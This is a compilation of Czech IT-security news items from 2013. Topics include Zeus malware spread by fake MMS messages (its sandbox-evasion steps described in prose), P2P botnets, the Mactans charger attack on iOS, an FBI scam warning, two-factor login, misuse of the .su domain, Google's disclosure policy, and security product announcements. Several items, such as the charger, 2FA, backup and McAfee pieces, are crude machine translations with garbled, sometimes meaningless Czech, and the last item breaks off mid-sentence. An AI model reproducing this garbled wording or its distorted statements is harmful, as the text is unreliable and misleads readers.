Polovina (50 procent) respondentů povolit přístup k více než 250 partnerů Více než polovina (54 procent), povolit přístup k více než 250 dodavatelů / konzultantů Více než polovina (55 procent), povolit přístup pro 1500 a více zaměstnanci 45 procent povolit přístup pro 4000 a více zákazníků Tři čtvrtiny (76 procent) mají politiku, která umožňuje zaměstnancům přístup k firemním aplikacím prostřednictvím mobilních zařízení, 68 procent má mobilní přístup politiky pro partnery. "Případy hacků a náhodného datového expozice jsou vždy obavy, ale nedostatek viditelnosti a kontroly jsou také červené vlajky v dnešním prostředí," řekl Shayne Higdon, Symplified prezident a výkonný ředitel. "Osmdesát šest procent IT profesionálů jsme dotázaných udržet dva nebo více úložišť identit uživatelů - praxe, která může vést k přístupu a porušování zásad. BYOD a SaaS používat společně také představuje unikátní výzvu, jako zaměstnanci a partneři používat více vlastních prostředků, organizace ztratit přehled o tom, co dělají, když jste přihlášení do SaaS služeb. Tyto problémy zdůrazňují důležitost znát vaše bezpečnost, dodržování předpisů a další specifické potřeby, jak budete budovat si své správy identit strategii. "
Experti: Zprávy MMS v Česku šíří důmyslný malware
Výzkumníci firmy AVG tvrdí, že v České republice zaznamenali malpware, který se distribuuje prostřednictvím zpráv MMS. Ty se přitom tváří, že pocházejí od lokálního mobilního operátora jako třeba T-Mobile CZ.
Mobilní
Spam má přílohu, kterou je škodlivý spustitelný soubor s dvojitou příponou tvářící se jako obrázek formátu JPG (např. “MMS img 76897644.jpeg.exe“). Většinou se jedná o bot sítě Zeus, který při stažení kontaktuje svůj řídící (command & control, C&C) server a stáhne tak do přístroje další škodlivé soubory.
Z technického hlediska prý má tento malware velmi zajímavé vlastnosti:
Po spuštění souboru dojde k dešifrování dat a k zahájení kontroly za účelem prozkoumání daného prostředí, např. ověření identifikačního čísla diskové jednotky, zda neobsahuje emulátory procesoru qemu, virtual, vmware nebo xen (pomocí příkazu HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum\)
Pokud jsou úspěšně provedeny všechny potřebné testy a není objeven žádný debugger, provede program v přístroji změny prostřednictvím registrace callback funkce FileIOCompletionRoutine.
V dalším kroku se malware pokusí aplikovat kód a zašifrovat data do procesu explorer.exe. Podle dané verze Windows (32bit/64bit) se poté zvolí jedna ze dvou dostupných metod aplikace malwaru.
Vzrůstá používání komunikace P2P k šíření malwaru
Množství malwaru, který používá komunikaci typu peer-to-peer, se za poslední rok zpětinásobilo. Zjistili to výzkumníci ze společnosti Damballa.
Viry
Největší podíl na tomto vzrůstu mají pokročilé hrozby jako ZeroAcces, Zeus 3 a TDL4, řekl Stephen Newman, produktový viceprezident společnosti Damballa. Dodal, že i další skupiny malwaru poslední dobou začínají P2P využívat pro své řídící uzly. „Využívání P2P v pokročilých malwarových hrozbách už se děje delší dobu, ale nikdy jsme nepozorovali, že by mělo takový význam, jaký zaznamenáváme v současnosti.“
Podle Newmana může být důvodem touha kyberzločinců po větší odolnosti proti pokusům o jejich vyřazení, které mohou narušit centralizované struktury botnetů. V případě vypnutí řídících serverů ztratí správci botnetu přístup k tisícům nebo dokonce milionům infikovaných počítačů. Komunikace přes P2P je decentralizovaná a klienti botnetu si mohou posílat příkazy vzájemně. Další výhodou pro útočníky je, že přenos P2P je na síťové úrovni hůře dohledatelný a blokovatelný za použití tradičního přístupu, který se spoléhá na seznam známých adres IP a hostitelů, spojených s řídícími servery.
Nejrozšířenější skupinou malwaru, která používá komunikaci P2P, je podle Johna Jerrima, vědeckého pracovníka v Damballe, pravděpodobně TDL4. Ten však používá P2P pouze jako zálohu v momentech, kdy nemůže kontaktovat primární server DGA (domain generation algorithm). Malware TDL4 je známý velkou odolností. Pokud se do počítače dostane, je velmi těžké ho odstranit, protože infikuje zaváděcí záznam, speciální část pevného disku, která obsahuje kód spouštějící se před startem operačního systému. Tento nástroj se používá především k distribuci dalšího malwaru.
Virus známý jako GameOver nebo Zeus verze 3 je trojský kůň, který krade bankovní údaje a další data spojená s financemi. Na rozdíl od TDL4 používá Zeus v3 P2P jako primární řídící uzel a DGA pouze jako zálohu.
Nejzajímavější hrozbou je ZeroAcces, který pro řízení používá pouze P2P. Malware je šířen s pomocí webových nástrojů, například Blackhole, Neosploit nebo Sweet Orange a je používán především k podvodům při těžení Bitcoinů.
Společnost Damballa vydala zprávu (v PDF) o používání komunikace P2P v úterý.
Nepodceňujte bezpečnostní rizika SMB
Malé a středně velké firmy čelí úplně stejným bezpečnostním rizikům jako velké společnosti. Jen se o tom tolik nemluví.
Rizika
Odborníci na počítačovou bezpečnost se shodují, že všechny firmy bez ohledu na velikost by měly posuzovat svá bezpečnostní rizika a hledat možnosti jejich zmírňování. Přitom nikdy neuškodí se obrátit na odborníky.
Dá se ve firmě obejít bez počítačové bezpečnosti? Nejnovější trendy ukazují, že v žádném případě. Ať už je podnikatelský obor vaší firmy jakýkoli, v 21. století je bezpečnostní software a firemní strategie ochrany dat nutností. Neodmyslitelnou součástí pracovní náplně většiny vašich zaměstnanců správy je dnes nakládání s e-maily, firemními daty, údaji o vašich dodavatelích a klientech apod. Jde o důvěrné informace, jejichž únik či ztrátu se nevyplatí riskovat.
Docela běžnou hrozbou pro většinu firemních počítačů jsou virové infekce, zavlečení malware či spyware, které ohrozí či zpomalí funkčnost hardware nebo zapříčiní únik vašich interních dat. Zároveň se vaše společnost může stát obětí sofistikovaného, cíleného kybernetického útoku, jehož cílem může být cokoliv, co jsou schopni počítačoví zločinci zpeněžit.
Informační struktura každé organizace je navíc zatěžována rostoucím počtem nejrůznějších zařízení komunikujících mezi sebou a vnějším světem bez patřičné kontroly IT oddělení. Tento trend se ještě prohlubuje vzhledem k současnému fenoménu BYOD (přines sis své vlastní zařízení) a nárůstu práce z terénu a domova. Tím se zvyšují technologické, finanční a také personální a odborné nároky na dosažení informační bezpečnosti. Tyto nároky se přitom dají snadno minimalizovat.
Chcete-li se spolehnout na to, že jsou vaše data v bezpečí, nabízí se možnost nechat si otestovat vlastní zranitelnost. Kvalitní odborné testování slouží jako prevence před bezpečnostními incidenty a pomáhá ve včasné identifikaci bezpečnostních chyb v systémech. Dokáže také sledovat vývoj stavu bezpečnosti, čímž v konečném důsledku umožní optimalizaci nákladů na následnou implementaci bezpečnostních opatření.
EVA (ESET Vulnerability Assessment, vyhledávání a správa zranitelností) je internetová služba vyhledávající zranitelnosti zařízení, která jsou dostupná z internetu. Testování je možné vykonávat jednorázově nebo periodicky. Výsledek testu je shrnut v reportu, který obsahuje výčet všech zjištěných zranitelností, ohodnocení jejich závažnosti, obecný popis, tzv. risk factor dle standardů CVSS, odkaz na veřejně dostupné zdroje a obecný návod na jejich odstranění. Účinnost servisního zásahu je možno okamžitě ověřit pomocí manuálního testu.
Nástroj vytvořený týmem specialistů ESET Services je schopen periodicky testovat vaše zařízení dostupná z internetu a v reálném čase identifikovat výskyt zranitelnosti znamenající bezpečnostní riziko pro váš systém. Získáte tak informace v okamžiku výskytu zranitelnosti, což vám umožní okamžitě podniknout opatření potřebná k její eliminaci. Odpadá tak potřeba obstarávat a udržovat speciální zařízení a software a zaměstnávat vyškolený personál.
Úroveň EVA Free otestuje všechna zařízení nezávisle na použitém operačním systému, dále perimetr, aplikační servery, vzdálené přístupy VoIP, video a vybrané porty. Mezi hlavní výhody testu patří to, že neohrožuje testovaný systém a jednou měsíčně se aktualizuje databáze 9 000 zranitelností. Výsledky testu obdrží uživatel na e-mail, obsahují seznam zranitelností, popis a základní návod na jejich odstranění.
EVA Pro je oproti tomu služba pro systematickou správu zranitelností. Oproti bezplatnému řešení nabízí periodické testy, podrobný popis zranitelností i jejich všeobecné zhodnocení. Samozřejmou součástí je i propojení s IS zákazníka, technická podpora a shoda s požadavky ISO 27000. Testování 1-10 IP adres nyní vyjde na cca 12 500 Kč bez DPH.
Internetová služba EVA využívá techniky, které výrazně neomezují provoz testovaných systémů. Pro zkrácení reakční doby v případě zjištění zranitelnosti je možné využít zasílání informací pomocí implementované funkce RSS kanálu. Takto je možno získávat avíza o zranitelnostech pomocí RSS čteček v mobilních zařízeních, například ve smartphonech nebo tabletech.
Softwarové firewally Stonesoftu nabízí v Česku Comguard
Comguard začne v Česku distribuovat firewally, které získal McAfee akvizicí společnosti Stonesoft. Na rozdíl od dosavadních systémů od McAfee, které využívají aplikační proxy brany, je novinka koncipovaná jako software.
Zabezpečení
Řešení Stonesoftu zahrnuje firewall a VPN s podporou funkcí IPS (intrusion prevention systém), dále nabízí inspekci šifrovaného provozu pro SSL a TLS, a to jak pro klienta, tak i pro server, zabezpečení pomocí antiviru, antispamu a webového filtru.
Součástí produktu je i pokročilá správa provozu přes firewall a Quality of Service, přehled nad využívanými aplikacemi, nastavení bezpečnostních pravidel na základě uživatelů, skupin, typu provozu, zdrojové nebo cílové IP adresy, podpora IPv6 a 3G a integrovaná VPN.
Firewall Stonesoftu stojí na bázi Security Engine, součástí řešení je i bezpečnostní konzola Management Center.
Firewall /VPN má také mimo jiné certifikaci Common Criteria level EAL 4+.
Fake iPhone nabíječka může zaseknout iOS v rámci 60 sekund 03.6.2013 Hrozby Falešný iPhone nabíječka by mohla být použita, aby se vyhnula obranu smartphonu Apple, tři vědci z Georgia Tech tvrdí. V nadcházející prezentaci na letošním Black Hat konferenci Bezpečnost v Las Vegas, výzkumníci tvrdí, že vytvořili "škodlivý", nabíječku, která může vnést software do zařízení iOS za necelou minutu. "Apple iOS zařízení jsou považovány za mnoho být bezpečnější než jiné mobilní nabídky," uvádí zpráva. "Zkoumali jsme, do jaké míry bezpečnostní hrozby se vzít v úvahu při provádění každodenních činností, jako je nabíjení zařízení." Vědci jmenoval jejich "škodlivé nabíječky" mactans - odkaz na Latrodectus mactans, vědecký název pro černou vdova. Falešný iPhone nabíječka byl postaven za použití základní open-source jedno palubní počítač, a které mohou ohrozit stávající generace iOS zařízení bez zásahu uživatele - vstřikování software, který vědci tvrdit, je velmi obtížné odhalit. "Všichni uživatelé jsou ovlivněny, jak náš přístup nevyžaduje ani jailbroken zařízení ani interakce uživatele," výzkumníci Billy Lau, Yeongjin Jang a Chengyu Song řekl ve svém souhrnu hovoru. "Výsledky byly alarmující: přes nepřeberné množství obranných mechanismů v iOS, jsme úspěšně aplikovat libovolný software do současné generace zařízení Apple používají nejnovější operační systém (OS) software," uvádí zpráva. "Pro zajištění stálosti výsledného infekce, ukážeme, jak útočník může skrývat jejich software stejným způsobem Apple skrývá své vlastní vestavěné aplikace." "Tento hardware byl zvolen prokázat snadnost, s níž nevinně vypadající, může škodlivý USB nabíječky být postavena," uvádí zpráva. "Zatímco mactans byla postavena s omezeným množstvím času a malým rozpočtem, jsme také krátce zvážit, co více motivovaní a dobře financované protivníci mohli dosáhnout." V rozhovoru pro Andy Greenberg Forbes, výzkumníci říkají, že kontaktoval Apple, pokud jde o exploit, ale ještě ozvou. Greenberg poukazuje na to, že tento hack není první, kdo se využít kombinovaných dat a napájecího portu na iOS - mnoho "útěk z vězení" hacky tak učinit - ale, že tato metoda je mnohem "méně přátelské". Příspěvek Fake iPhone nabíječka může zaseknout iOS v rámci 60 sekund se objevil poprvé na Žijeme zabezpečení.
Zločinci používají pro sdílení fotografií na snare obětí v aukci podvody, FBI varuje 03.6.2013 Kriminalita Počítačoví zločinci se pomocí on-line auto aukce a sdílení fotografií služby napálit oběti do stahování malware, FBI varovala. Jakmile infikován, jsou oběti vedlo k falešné webové stránky kupovat auta - a když zaplatí, zločinci zmizí. V příspěvku na blogu FBI zpravodajství, úřad upozorňuje na podvod, kde se vozidlo kupující podvedeni falešnými reklamami, které se objevují bez obrázků, s fotkami k dispozici "na vyžádání". Obrazy jsou odeslány buď jako přílohu nebo jako odkaz na on-line služby pro sdílení fotografií - ale v obou případech se fotografie doručit malware do počítače oběti. FBI také varuje, že podvodníci se také obrátit na zákazníky, kteří ztratili on-line aukci, říká, že "původní uchazeč propadla", a pak se pokusit o stejný podvod. "Pokud se chystáte ke koupi vozu on-line, mějte se na pozoru," říká úřad ve svém příspěvku. "Hackeři jsou vysílání reklamy na internetu bez obrázků, fotografií poskytování pouze na vyžádání. Na fotografiích často obsahují malware, který infikuje počítače oběti. " "Tento škodlivý software bude řídit oběť na falešné webové stránky - je provozován na kybernetických zločinců - to vypadá téměř totožný místě, kde byla reklama původně viděli. Když se oběť zavazuje ke koupi zboží a provádí platbu, zločinci zastavit veškerou korespondenci a oběť nikdy obdrží zboží. " FBI varuje kupující dát pozor na velmi nízké ceny, a dávat pozor na podezřelé autosalony a nejistých webových stránek při nákupu vozidel. "Udržujte svůj počítačový software, včetně operačního systému, který byl aktualizován s nejnovějšími záplatami," říká úřad ve svém příspěvku. "Zkontrolujte, zda je anti-virus software a firewally jsou aktuální - mohou pomoci zabránit malwaru." Postu Zločinci používají pro sdílení fotografií na snare obětí v aukci podvody, FBI varuje poprvé objevil na Žijeme zabezpečení.
Evernote a LinkedIn zvýšení zabezpečení s dvoufaktorovou autentizaci 31 květen 2013 03:55 PDT Zabezpečení Evernote a LinkedIn oba přidána možnost pro dvoufaktorové autentizace v několika posledních dní - dní po Twitter oznámil svůj volitelný dvoufaktorové bezpečnostní systém. Oba Evernote a Twitter se stal obětí high-profil narušení dat v minulém roce, se LinkedIn utrpení porušení v létě 2012. Evernote nutné se svými 50 milionů uživatelů resetovat jejich hesla na začátku tohoto roku poté, co hackeři získali přístup k detailům, včetně uživatelských jmen, e-mailových adres a zašifrovaná hesla. "" Většina internetových účtů, které stanou ohroženy jsou neoprávněně přistupovat z nového nebo neznámého počítače (nebo zařízení), "řekl LinkedIn v blogu. "Ověření ve dvou krocích pomáhá tento problém řešit tím, že vyžaduje, abyste zadejte číselný kód při přihlašování z neznámého zařízení poprvé. Tento kód bude zaslán na váš telefon prostřednictvím SMS. Pokud je povoleno, ověření ve dvou krocích ztěžuje neoprávněným uživatelům přístup k vašemu účtu, který vyžaduje, aby měli oba své heslo a přístup do vašeho mobilního telefonu. " Nové Evernote funkce byly vyhlášeny v blogu. Stejně jako dvoufaktorová autentizace (buď pomocí SMS zpráv nebo vyhrazený APP), stránky také nabízí přístup k historii a nové povoleném typu použití ovládací panel, který umožňuje uživatelům spravovat, které aplikace mají přístup k účtu Evernote. "Ověření ve dvou krocích, také známý jako dvoufaktorové autentizace, je navržen tak, aby váš účet zabezpečit i když někdo učí své heslo," řekl místo ve svém příspěvku. "To se obvykle stane, když se přihlásíte do Evernote webu nebo nainstalovat na nové zařízení. Co dělá ověření ve dvou krocích silný je šestimístný ověřovací kód. Tento kód je dodán svého mobilního telefonu prostřednictvím textové zprávy, nebo chcete-li, generované aplikace, která běží na vašem mobilním telefonu, jako je například Google Authenticator. Budeme také vám sadu jednorázových záložních kódů, když jste na cestách. " "Zplnomocněným Aplikace" panel umožňuje uživatelům zrušit app přístupu k účtu Evernote - bezpečnostní funkce navržena, stránky říká, pro chvíle, kdy uživatelé "ztratí telefon nebo počítač." "Chceme, abyste otevřít aplikaci Evernote a pak rychle dosáhnout svého úkolu," řekl místo ve svém příspěvku. "Aby to bylo možné, jsme málokdy vás požádat, abyste se přihlásit Nyní můžete zrušit jakoukoli verzi Evernote z vašich webových Nastavení účet Evernote. Po zrušeno, bude aplikace požadovat heslo při příštím ITS zahájena. "
Kyberzločinci si oblíbili doménu bývalého SSSR
Sovětský svaz sice již dávno neexistuje, na internetu však jeho život pokračuje dál. Toho nyní ve velkém zneužívají různí kybernetičtí pobertové.
Podle bezpečnostních odborníků si totiž elektroničtí zloději oblíbili doménu .su, která byla kdysi přidělena právě zemím SSSR. S komunismem to však nemá co dělat. Kriminálníci doménu využívají k posílání spamu a peněžním podvodům.
Internetoví útočníci na webové adresy s koncovkou .su přesunuli velkou část svých aktivit poté, co správci ruské domény .ru v roci 2011 zavedli přísnější pravidla. Podle ruské bezpečnostní organizace Group-IB se počet podvodných stránek provozovaných pod doménou .su v roce 2011 zdvojnásobil a stejná situace se pak opakovala i v roce 2012.
„Sovětská doména se musí potýkat s velkými problémy,“ říká Andrej Komarov z Group-IB. „Podle mého odhadu ji nyní používá více než polovina kyberzločinců z Ruska a zemí bývalého SSSR.“
Nejvíce pozornosti se v poslední době dostalo stránce Exposed.su, na které byly zveřejňovány informace o platebních záznamech patřících první americké dámě Michelle Obamové, poslednímu republikánskému kandidátovi na prezidenta Mittu Romneymu, Donaldu Trumpovi, zpěvačce Britney Spearsové, Beyoncé nebo známému golfistovi Tigeru Woodsovi. Web momentálně není funkční.
Jiné webové stránky s doménou .su jsou pak používány především pro řízení botnetů, posílání spamů a realizaci útoků vedených vůči konkurenčním stránkám.
Hostingové společnosti obvykle takové stránky vyřazují z provozu okamžitě, jakmile se na ně přijde. Hackeři operující na doméně .su však mohou své útoky vést i několik měsíců.
Historie sovětské domény sahá až do samého počátku internetu, kdy jeho architekti přiřadili každému státnímu útvaru vlastní koncovku. Některé domény z období studené války pak zmizely stejně rychle jako železná opona dělící východ Evropy od západu – tak tomu bylo v případě jugoslávské .yu nebo východoněmecké .dd. Doména .su však přežila rozpad SSSR v roce 1991 i vznik ruské domény o tři roky později.
Na sovětské doméně je v současné době registrováno přes 120 tisíc webů. Zrušení domény by proto nyní bylo velmi složité. Komarov takovou iniciativu přirovnal ke snaze o zrušení domén .com nebo .org. Na doméně .su totiž stále běží velké množství legitimních stránek. Mezi ně patří třeba stalin.su, na které je bývalý diktátor dáván za vzor ctnosti, nebo parodický projekt chronicle.su.
„Uvědomujeme si, že zločinci našemu obrazu příliš nepřidají,“ řekl Sergej Ovčarenko z moskevské organizace Foundation for Internet Development, která za doménu .su v roce 2007 převzala zodpovědnost. Podle něj se problém týká jen malého procenta stránek s koncovkou .su.
Za zdlouhavé vypínání škodlivých webů prý může složitá ruská legislativa a zastaralé podmínky používání. Ovčarenko však ujišťuje, že se již pracuje na tvrdších pravidlech, která by měla útočníky od zneužívání této domény odradit.
Google nechá výrobcům jen sedm dní na opravu chyb
Nová politika zmenšuje okno, ve kterém softwaroví výrobci musí veřejně reagovat na tzv. chyby zero-day, které objevili výzkumníci Googlu a na které tyto výrobce upozornili.
Zranitelnosti
Google se minulý týden rozhodl vystupňovat tlak na vývojáře softwaru, kteří reagují příliš pomalu na chyby ve svých výrobcích. Pokud je taková chyba objevena pracovníkem Googlu, výrobce má sedm dní, aby veřejně zareagoval a uvolnil opravu nebo alespoň bezpečnostní doporučení. Pokud tak neučiní, bude o dané chybě Google veřejnost informovat sám. Rozhodnutí oznámil v blogu Chris Evans a Drew Hintz, bezpečnostní experti Googlu: „Zrovna nedávno jsme objevili aktivní útok na do té dobu neznámou a neopravenou slabinu v softwaru patřící jiné společnosti. Není to nic neobvyklého, bezpečnostní výzkumníci Googlu příležitostně narážejí na reálná zneužití veřejnosti neznámé chyby (zero-day). Takové případy vždy okamžitě hlásíme výrobci programu a těsně s ním spolupracuje na řešení.“ Oznamování zranitelných míst je již delší dobu horké téma a Google v minulých letech vyvíjel nátlak na výrobce, aby rychleji varovali své uživatelé a opravovali chyby. Samozřejmě, nouzové opravy mohou způsobit celou řadu dalších problémů a například Microsoft vždy trval na tom, že na opravy by neměl platit specifický termín, který by snižoval jejich kvalitu. Nyní se ale Google rozhodl celý proces výrazně zrychlit. Vždy doporučoval, aby výrobci kritická zranitelná místa opravili do 60 dnů a pokud oprava není možná, měli by veřejnost informovat o existujícím problému a potenciálních alternativních řešeních. Ale vzhledem k dění na internetu dnes Google věří, že u kritických chyb, které jsou již aktivně zneužívány, je lhůta 7 dní přiměřenější, protože v takovém případě každý den navíc vede k lavinovému šíření nakažených počítačů. Připouští sice, že týdenní reakční doba je velmi krátká a nemusí být zvládnutelná pro některé výrobce, ale sám se chce při opravách vlastních chyb chovat podle této politiky. „Pokud uběhne sedm dní a na internetu nebude publikována aktualizace nebo přiznání chyby s doporučením, jak se mají uživatelé chovat, naši pracovníci budou moci uvolnit všechny objevené detaily, aby se uživatelé mohli bránit sami. Tím, že se takto přísnými standardy budeme řídit i sami, přispějeme k lepšímu stavu webové bezpečnosti.“ Letošní rozhodnutí Googlu není neočekávané, již v roce 2010 jeho bezpečností tým zmiňoval nezodpovědnost výrobců, kteří často oznámené chyby ignorují i roky. Od té doby se toho příliš nezměnilo, aktivnější byla spíš strana na druhé straně barikády, existuje aktivní obchod s informacemi o nalezených slabinách programů, ale i s konkrétními nástroji na jejich zneužití. Konkrétní útoky jsou stále častěji cíleny na specifické části publika, jsou závažnější a hůře zachytitelné. Častým cílem jsou například političtí aktivisté a kompromitování jejich počítačů může mít citelný dopad na bezpečnost dané části světa...
Microsoft nabízí bezpečnostní systém v cloudu
Microsoft se aktivně zapojuje do boje proti sítím botnetů. Dalším krokem má být systém časného varování. Nabízí spojení s Azure, které zlepšuje schopnost šířit informace o hrozbách prakticky v reálném čase. Nepochybně skvělé, ale trochu samozřejmé...
Zabezpečení
Společnost Microsoft v úterý spustila program, který propojuje jejich informační systémy monitorující bezpečnost s cloudem Azure. Nová služba, nesoucí označení C-TIP (Cyber Threat Intelligence Program), nabídne podle Microsoftu provozovatelům internetových služeb (ISP) nebo oddělením reagujícím na počítačové hrozby (CERT – computer emergency response team) přístup k bezpečnostním informacím téměř v reálném čase. Podle blogu Microsoftu se uživatelé počítačů, zejména ti, kteří nepoužívají aktualizovaný a legitimní software a chybí jim adekvátní ochrana proti malwaru, stávají stále častěji obětí kriminálních gangů, které se snaží jejich počítače infikovat a proměnit v poslušnou součást obrovských armád známých jako botnety. Ty jsou po vybudování zneužívány k různým útokům online. Microsoft se v minulosti aktivně podílel na likvidaci mnoha botnetů vybudovaných pomocí malware Conficker, Waledec, Rustock, Kelihos, Zeus, Nitol a Bamital. Ale i po zrušení botnetů po nich na internetu zůstávají infikované počítače, které je třeba očistit. To už je ale na týmech, které mají nad jednotlivými počítači nějakou moc, ať už je to příslušný ISP, který má pod kontrolou jejich připojení k Internetu, nebo pracovníci IT nesoucí za příslušné počítače zodpovědnost. Podle Jeffa Williamse, vedoucího bezpečnostních strategií divize Dell Secureworks, je sice zrušením řídícího centra botnetu z internetu odstraněna naprosto klíčová část fungování botnetu, ale je to jen první krok. „Pokud systémy zůstanou infikovány, umožní to zločineckým gangům vytvořit nový botnet. Je skutečně nezbytné, aby byla každá část botnetu odstraněna.“ K tomu dodává T. J. Campana, ředitel Centra pro kybernetickou kriminalitu společnosti Microsoft: „V současnosti Microsoft zpracovává stovky milionů bezpečnostních události na den. Očekáváme, že v dohledné době toto množství přesáhne desítky a možná stovky miliard.“ Cloud Azure, kde Project MARS (Microsoft Active Response for Security) zpracovávající tyto informace nyní běží, se díky možnosti elasticky alokovat potřebnou kapacitu s podobným zatížením dokáže bez problémů vyrovnat. A stejně tak bude schopen o existenci problémů a nezbytnosti akce informovat všechny příslušné organizace. Bezpečnostní analytici tyto kroky Microsoftu vítají. „Microsoft získává informace z milionů koncových zařízení. Bylo na čase, aby byl aktivnější. Ve skutečnosti něco podobného měl nabídnout už před lety,“ myslí si Avivah Litanová z Gartneru.
LinkedIn nasadil lepší zabezpečení uživatelů
LinkedIn se připojil k dalším velkým internetovým společnostem a zprovoznil dvoufázovou autorizaci, díky níž by uživatelé měli být lépe chráněni proti kybernetickým útokům.
30.5.2013 Zabezpečení
Uživatelé sociální sítě LinkedIn nyní mají možnost ke svým účtům přidat dvoufázový autorizační proces, díky kterému budou při přihlašování z nového nebo neznámého zařízení chráněni ještě jednou bezpečnostní vrstvou. Se zapnutou dvoufázovou autorizací budou uživatelé muset při přihlašování zadat speciální kód, který jim přijde textovou zprávou na telefon. Tato zpráva přijde pouze poprvé, když se člověk přihlásí z neautorizovaného počítače nebo zařízení. LinkedIn v pátek na svém oficiálním blogu uvedl, že většina účtů byla v minulosti napadena z nových počítačů nebo jiných zařízení. Počet případů, kdy se někdo neoprávněný s nekalým úmyslem přihlásil k účtu uživatele z jeho počítače, je údajně zanedbatelný. Dvoufázová autorizace může být zapnuta v nastavení účtu uživatele v kolonce Bezpečnost. Po jejím zapnutí LinkedIn odešle speciální kód na telefon pro každé zařízení, z něhož se uživatel bude chtít přihlásit. Změny v LinkedIn přicházejí jen týden poté, co dvoufázovou autorizaci představil Twitter v návaznosti na sérii hackerských útoků na účty známých firem. Bezpečnostní experti již dlouho poukazují na to, že zavedení lepší ochrany účtů je nutností. V minulém roce LinkedIn vyzval své uživatele, aby si změnili hesla poté, co se objevily na ruské hackerské stránce. Mezi další společnosti, které již lepší zabezpečení nasadily, patří mimo jiné Apple, Google nebo Facebook. Jak však upozorňují bezpečnostní experti, i když dvoufázová autentifikace přidá speciální vrstvu zabezpečení, nezaručuje 100% bezpečnost uživatelských účtů. Útočníci mohou například provést emailový phishingový útok, v rámci kterého zfalšují přihlašovací stránku služby tak, že uživatel do formuláře zadá kód, jenž mu přišel zprávou SMS. Google tento týden shodou okolností zveřejnil tipy na bezpečná hesla, jimiž by se uživatelé měli řídit. Společnost například doporučuje, aby uživatelé používali pro každou službu jiné heslo a kombinovali malá i velká písmena a číslice.
Anonymous hacker Jeremy Hammond přizná 29. května 2013. Hacking
Jeremy Hammond (aka "Anarchaos"), anonymní hacker, který byl obviněn loni zločinů týkajících se v prosinci 2011 hack strategického prognózování ("Stratfor") a veřejné šíření informací získaných prostřednictvím tohoto hack, se přiznal v úterý. " Tento nespolupracující námitka dohoda uvolní, abych světu, co jsem udělal a proč, aniž by odhalil nějaké taktiky nebo informace vládě a aniž by byly ohroženy životy a blaho ostatních aktivistů a offline, " napsal 28-rok- let v důsledku jeho prosbě. "Teď, když jsem se přiznal, že je to úleva, aby mohli říct, že jsem udělal práci s Anonymní hack Stratfor, mimo jiné webové stránky. Tyto další součástí vojenské a policejní zařízení dodavatele, vlastní inteligencí a firmy v oblasti bezpečnosti informací a donucovacích orgánů. Udělal jsem to, protože jsem si, že lidé mají právo vědět, co vlády a korporace dělají za zavřenými dveřmi. Udělal jsem to, čemu věřím je správné. " Podle dohodě prosby , může přijmout maximální trest 10 let vězení, tři roky pod dohledem vydání, pokuta větší než 250.000 dolarů, a souhlasil, aby restituce ve výši, která nepřesáhne 2.500.000 dolarů. Všechny ostatní otevřené číslic (obsažené v dohodě prosby) se odvolává vláda. Hammond je naplánován být odsouzen v září.
Zálohování velkých objemů dat s velkým Cloud 29. května 2013. IT
Sterling Data Storage vydala své největší řešení zálohování dat - dosud velký mrak . Byl určen pro společnosti, které potřebují bezpečně ukládat velké objemy, aniž by byla obětována výhody typicky spojené s cloud zálohování dat, včetně, bez velkých počátečních kapitálových výdajů a minimální průběžné náklady.
Zbrusu nový velký mrak podnikové zálohování dat slouží firemním zákazníkům, kteří potřebují uchovat nejméně 2 TB dat. "Sterling ukládání dat je odhodlána zůstat na špici našeho průmyslu a nadále poskytovat ty nejlepší velké zálohování dat řešení pro naše zákazníky, "řekl Jim Morand, generální ředitel České koruny ukládání dat. "Jsme odhodláni nabízet ty nejlepší a nejbezpečnější výrobky v podnikání Chceme, aby naši zákazníci mohli zaměřit se na své podnikání -. nestará o bezpečnost svých dat," Morand přidáno. Popularita cloud computing a hromadných údajů zálohování rychle roste v posledních letech jako malé a střední podniky rostou pohodlně zálohování cloud listu, dozvědět se o jeho výhodách, které patří vysoká škálovatelnost, nepřekonatelnou ochranu dat a cenovou dostupnost. Poptávka ukládání dat v elektronické Odhaduje se, že zvýšení o 61 procent v průběhu příštích pěti let. Jak firmy rostou a hromadí větší množství dat, jejich zálohování dat potřebuje velké i nárůst. Velký Cloud poskytuje podnikové zálohování dat, zatímco nadále nabízet rychlost a efektivitu, pro něž jsou známy Sterling ukládání dat v jiné produkty. Bezpečnostní funkce patří více umístění záloh, šifrování dat před dopravy a omezení přístupu - pouze vlastník firmy si prohlédnout uložené informace . Firmy, které potřebují, aby splňovaly přísné předpisy z hlediska jejich uloženým informacím, jako jsou podmínky stanovené v baru American Association, zdravotního pojištění přenositelnosti a odpovědnosti zákon (HIPPAA) a Sarbanes-Oxley Act, zjistíte, že bezpečnostní opatření, používá se velký mrak, velkých objemů dat zálohovací řešení, udržovat bezpečnost a důvěrnost informací. Kromě toho poskytuje vysokou úroveň zabezpečení důležitých dat, budou společnosti najít další výhody z velkého zálohování dat, které nabízí velký mrak. Tato technologie je vysoká škálovatelnost umožňuje společnostem platit pouze za údaje, které používají. Když obchodní růst pohání potřebu dalších údajů, může společnost snadno kupovat další prostor pro zálohování -. To vše bez nutnosti velké vstupním kapitálové výdaje nebo náklady spojené s pokračující modernizací hardware a software Velký Cloud podporuje běžně používané systémy obchodních provozní, například Microsoft , Mac a Linux, takže je přístupný volbou pro mnoho firem. Zálohování dat se zaměřuje na změně obsahu pouze, což je systém rychlé a efektivní.
McAfee představila Kompletní apartmá Endpoint Protection 29. května 2013. Ochrany
McAfee představila dva nové apartmány: McAfee Kompletní Endpoint Protection - Podnikání a McAfee Kompletní Endpoint Protection - Business.
Součástí apartmánů je McAfee Hluboké Defender, rootkit ochranu na základě hardwarové zvýšení bezpečnosti společně vyvinuté společností Intel a McAfee, dynamický Whitelisting, riziko inteligence, a real-time řízení bezpečnosti. Tím, že zahrnuje správu mobilních zařízení a podporu pro Mac a Linux, McAfee apartmá pomáhá firmám všech velikostí ochranu přístroje, dat a aplikací. Bezpečnostní pracovníci budou mít prospěch z rozšířeného rozsahu pokrytí nakládáno v rámci jediné konzoly. Správci IT mohou vidět efektivní instalaci během několika minut, nikoli hodin, pro usnadnění nasazení. Koncoví uživatelé mohou těžit z vyšší výkon skenování, která minimalizuje potenciální režii účinné ochrany. Moderní hrozby začít s někdy-rostoucí proud phishingu, škodlivých webových stránek, rootkity a ohrožení zařízení. Tyto počáteční kontakty se může změnit v trvalé, multi-fáze, cílených útoků. Exploze zařízení násobí možnost útoku ovlivňující mobilní pracovní síly, které mohou nevědomky ohrozit podnikání a systémy při opětovném připojení k podnikové síti. McAfee řeší tyto překážky se svými 